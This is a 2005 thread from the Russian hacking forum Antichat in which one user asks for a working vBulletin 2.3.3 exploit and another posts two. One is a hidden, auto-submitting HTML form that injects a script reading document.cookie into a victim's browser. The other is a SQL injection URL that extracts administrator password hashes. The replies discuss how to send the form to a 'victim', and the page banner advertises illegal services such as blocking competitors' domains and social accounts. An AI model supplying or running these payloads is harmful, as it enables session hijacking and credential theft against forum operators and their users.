Форум АНТИЧАТ - Уязвимости в vBulletin v2.3.3

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Уязвимости в vBulletin v2.3.3

Опции темы

Поиск в этой теме

Опции просмотра

Уязвимости в vBulletin v2.3.3

01.08.2005, 12:24

SK | Heaton

Постоянный

Регистрация: 18.06.2005

Сообщений: 872

Провел на форуме:
3007945

Репутация: 765

Отправить сообщение для SK | Heaton с помощью ICQ

Уязвимости в vBulletin v2.3.3

Народ у ко нить есть реальный экплойт для vBulletin V2.3.3?!!!! Если есть по делитесь.. Плиз..

01.08.2005, 18:48

ProTeuS

HARDstasy

Регистрация: 26.11.2004

Сообщений: 1,367

Провел на форуме:
4226592

Репутация: 2175

Отправить сообщение для ProTeuS с помощью ICQ

примеры сплойтов:

-------------------------Remote.html-------------------------
<form action="http://host/newreply.php" name="vbform"
method="post" style='visibility:hidden'>
<input name="WYSIWYG_HTML"
value="<IMG src="javascript:alert(document.cookie)">"/>
<input name="do" value="postreply"/>
<input name="t" value="123456" />
<input name="p" value="123456" />
<input type="submit" class="button" name="preview"/>
</form>
<script>
document.all.preview.click();
</script>

----------------------------------------------------

last.php?fsel=,user.password%20as%20title,user.%20
%20%20%20username%20as%20lastposter%20FROM%20user,
thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT %201

----------------------------------------------------

02.08.2005, 11:51

SK | Heaton

Постоянный

Регистрация: 18.06.2005

Сообщений: 872

Провел на форуме:
3007945

Репутация: 765

2 ProTeuS этот твой сплойд написаный на VB Script-е надо отправить как сообщения жертве ?!

02.08.2005, 14:32

ProTeuS

HARDstasy

Регистрация: 26.11.2004

Сообщений: 1,367

Провел на форуме:
4226592

Репутация: 2175

Цитата:

Сообщение от SK | Heaton

2 ProTeuS этот твой сплойд написаный на VB Script-е надо отправить как сообщения жертве ?!

это не мой сплойт...но, как я понимаю, это форма для отправки мессаги, код которой будет исполняться в браузере жертвы

+ ты еще не заметил второй сплойт ниже, в старых версиях он может работать...

02.08.2005, 14:59

SK | Heaton

Постоянный

Регистрация: 18.06.2005

Сообщений: 872

Провел на форуме:
3007945

Репутация: 765

2 ProTeuS сделал... че-то не получается !!!

02.08.2005, 15:22

GreenBear

наркоман с медалью

Регистрация: 07.05.2005

Сообщений: 3,704

Провел на форуме:
19975136

Репутация: 4536

Отправить сообщение для GreenBear с помощью ICQ

http://www.securitylab.ru/?ID=1671&S...ring=vBulletin

__________________
Фреймворк для спамера :(
Услуги программирования

02.08.2005, 15:45

SK | Heaton

Постоянный

Регистрация: 18.06.2005

Сообщений: 872

Провел на форуме:
3007945

Репутация: 765

Цитата:

Сообщение от Green_Bear

http://www.securitylab.ru/?ID=1671&S...ring=vBulletin

прикинь пробовал не получается....

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Где почитать про уязвимости в vBulletin Version 3.0.7?	CBEKJIA	Форумы	2	15.12.2005 22:34
Уязвимости чатов	L@nd@R	Чаты	4	03.04.2005 05:12
Уязвимости в vBulletin 3.0.6	mikrobx	Форумы	23	14.03.2005 21:31
Уязвимости в форуме Powered by vBulletin Version 3.x.x	TORn@Do	Форумы	6	15.02.2005 14:50
Уязвимости Vbulletin и здешний форум	Монгол	Форумы	6	03.12.2004 15:27

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход